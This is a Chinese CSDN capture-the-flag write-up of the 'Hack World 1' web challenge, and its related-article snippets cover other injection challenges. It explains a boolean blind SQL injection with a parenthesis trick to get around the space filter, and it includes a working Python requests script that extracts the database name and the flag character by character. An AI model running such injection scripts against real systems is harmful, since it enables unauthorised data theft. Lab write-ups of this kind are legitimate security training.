[CISCN2019 华北赛区]Hack World 1

最新推荐文章于 2024-02-28 21:29:25 发布
最新推荐文章于 2024-02-28 21:29:25 发布
阅读量188 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/liuzixuan0207/article/details/117262953
版权

[CISCN2019 华北赛区 Day2 Web1]Hack World 1

经过测试为布尔盲注

此例不使用二分法 经过fuzzing测试
ascii没有被过滤,substr也没有!!空格被过滤可以使用()代替,,<>也没有被过滤,=也没有

爆数据库 payload

(ascii(substr(database(),%d,1))=%d)
其中%d为变量

题目提示在flag表中flag字段就是我们想要的东西

构造payload

data = {"id": "(ascii(substr((select(flag)from(flag)),%d,1))=%d)" % (i, j)}

编写python自动化攻击脚本

import requests

url = "http://7bfecddb-1daa-49b4-bec9-49bdc10155d7.node3.buuoj.cn/index.php"

flag = 'Hello, glzjin wants a girlfriend.'

final = ""

for i in range(1, 100):

 stop = 0
 for j in range(32, 129):
     stop = j
     data = {"id": "(ascii(substr(database(),%d,1))=%d)" % (i, j)}
     # data = {"id": "(ascii(substr((select(flag)from(flag)),%d,1))=%d)" % (i, j)}
     re = requests.post(url, data=data).text
     if flag in re:
         final += chr(j)
         print(final)
         break

 if stop >= 128:
     print("*" * 50)
     print(final)
     break

执行脚本 得到flag

ssp@
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ECharts使用的世界地图world.js
04-29
Echarts使用地图类型的组件时用到的js文件, 引入该文件可以使用ECharts Map,世界地图world.js
BUUCTF [CISCN2019 华北赛区 Day2 Web1]Hack World 1(SQL注入之布尔盲注)
m0_73734159的博客
12-09 750
在进行布尔盲注攻击时,攻击者首先需要对目标应用程序进行SQL注入,然后根据页面返回的结果来判断注入是否成功。布尔注入是一种常见的SQL注入攻击技术,攻击者通过构造恶意输入,使应用程序的SQL查询返回不同的结果,从而达到绕过应用程序的安全机制,获取未授权的信息或执行恶意操作的目的。总之,布尔盲注是一种比较复杂的SQL注入攻击方式,需要攻击者具备一定的技术水平和耐心。这种攻击方式主要利用Web页面的返回结果,根据页面返回的True或者是False来得到数据库中的相关信息。可知是字符型的布尔注入(盲注)
[CISCN2019 华北赛区 Day2 Web1]Hack World1
c1516175954的博客
03-07 192
盲注 异或 if控制
[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解
2302_79800344的博客
02-28 935
【代码】[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解。
2021-8-10ctf的Hack World 1(sql异或布尔盲注入,fuzz测试waf词语方法,通常做ctfsql题目的思路)
qq_45290991的博客
08-10 644
今天这道题算是一个总结吧,其实不难,就是很多细节没有办法想到所以导致出了很多问题。最近也一些关于ctf的sql注入的简单题目,我总结了一下经验,主要从审题、确定注入类型(难点),构造绕过waf的payload几个方面进行讲解。 一、审题 这道题我审题就没做好,为何这么说呢? 首先,题目的意思是在flag表中查询flag列即可: 但是用脚指头想都知道不可能这么简单呀!这是一个post数据的网页,然后就按照常规思路来吧: 我输入1,2,返回了正常的问候“找女友屌丝系列”: 接着我就用了常
[CISCN2019 华北赛区 Day2 Web1]Hack World 1
shinygod的博客
02-26 270
知识点:布尔注入,空格代替 根据提示select flag from flag 输入id=0,显示错误 输入id=1,显示hello import requests url = 'http://2895fd0f-6a71-4955-a21b-cfb434989994.node4.buuoj.cn:81/index.php' result = '' for i in range(1, 50): for j in range(32, 128): datas = {
BUUCTF Web [GYCTF2020]Blacklist1 & [CISCN2019 华北赛区 Day2 Web1]Hack World1
网安小趴菜
09-10 156
BUUCTF Web [GYCTF2020]Blacklist1 & [CISCN2019 华北赛区 Day2 Web1]Hack World1
web buuctf [CISCN2019 华北赛区 Day2 Web1]Hack World1
weixin_44214568的博客
03-20 1649
考点:盲注(布尔注入);异或的使用 1.输入1' 提示的是bool(错误),这里没有报错回显,只提示错误,其实就可以判断出是个布尔注入 2. 输入1' or '1=1'# 存在过滤,用bp抓包,fuzz进行爆破,看过滤了什么字符; (看回显,长度为482的都会提示sql注入,即被过滤的字符)这只能确定一部分,在实际操作中因为字符链接,字符本身都会产生新的过滤,注意一下 or的连接语句,空格等 3.根据提示 即从表flag的flag列内提取内容,根据前面的操作可知存在布尔注入,我
[CISCN2019 华北赛区 Day2 Web1]Hack World
沐目的博客
10-21 9027
1.测试过滤 我想到到了: 联合注入:unin被过滤 报错注入:and、or、updatexml被过滤 bool注入和time注入:and、or被过滤 可以通过fuzz测试(模糊测试),发现哪些字符被过滤了。length为482的,全都是被过滤的。 然后就在网上学了一些技巧: 利用/*!union*/可以绕过对union的过滤,虽然这题不能用,但是记一下吧。 2.异或 这东西和那个堆叠注入一样...
利用PHAR协议进行PHP反序列化攻击1
08-03
乎所有件操作函数都可触发 phar 反序列化题地址:[CISCN2019 华北赛区 Day1 Web1]Dropbox(链接:进题后,随意注册账号上传件,上传点
国赛华北赛区Day1Web1源码+学习说明.zip
01-14
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的竞赛项目学习资料,作为参考学习借鉴。...国赛华北赛区Day1Web1源码+学习说明.zip
国赛华北赛区Day1Web2源码+学习说明.zip
01-14
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的竞赛项目学习资料,作为参考学习借鉴。...国赛华北赛区Day1Web2源码+学习说明.zip
2019华北电力大学全日制学士学位招生目录1
08-03
① 101 思想政治理论 ② 201 英语一 ③ 301 数学一 ④ 811 电力系统分析基础 ① 电力系统综合 ② 高电压技术 ③ 电力电子技术 ① 发电厂电
2019华北电力大学全日制专业学位招生目录1
08-03
① 101 思想政治理论 ② 204 英语二 ③ 302 数学二 ④ 811 电力系统分析基础 ① 电力系统综合 ② 电力电子技术 ③ 高电压技术 ① 发电厂电
Java毕业设计-基于SSM框架的大学生社团管理系统带lw(源码+演示视频+说明).rar
05-09
Java毕业设计-基于SSM框架的大学生社团管理系统带lw(源码+演示视频+说明).rar 【项目技术】 开发语言:Java 框架:ssm+vue 架构:B/S 数据库:mysql 【演示视频-编号:438】 https://pan.quark.cn/s/b3a97032fae7 【实现功能】 实现了社长管理,社团信息管理,社团分类管理,社团加入信息管理,社团成员登记管理,活动信息管理等功能。
基于javaEE+Mysql实现的超市积分管理系统(源码+数据库sql+论文+视频齐全)
最新发布
05-09
【作品名称】:基于javaEE+Mysql实现的超市积分管理系统(源码+数据库sql+论文+视频齐全) 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【项目介绍】: 超市会员积分管理系统主要用于实现了企业管理数据统计等。本系统结构如下: (1)网络会员管理中心界面: 会员修改密码信息模块:实现会员密码功能; 会员登陆模块:实现会员登陆功能; 会员注册模块:实现会员注册功能; 留言板模块:实现留言板留言功能 (2)后台管理界面: 系统用户管理模块:实现管理员的增加、查看功能; 会员信息管理模块:实现会员信息的增加、修改、查看功能; 注册用户管理模块:实现注册用户的增加、修改、查看功能; 会员卡管理模块:实现会员卡信息的增加、查看功能; 商品销售管理模块:实现商品信息的增加、查看功能; 会员积分管理模块:实现合作公司信息的增加、查看功能; 信息统计模块:实现数据统计报表功能; 留言板模块:实现留言板信息的增加、修改、查看功能;
[ciscn2019 华北赛区 day1 web1]dropbox
06-06
1. 使用Burp Suite等工具,拦截上传请求。 2. 修改上传的文件,将文件名改为flag.php。 3. 将上传的文件类型改为php。 4. 将上传的文件内容改为以下内容: echo "flag{xxxxxxxxxxxxxxxxxxxx}"; ?> 其中,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值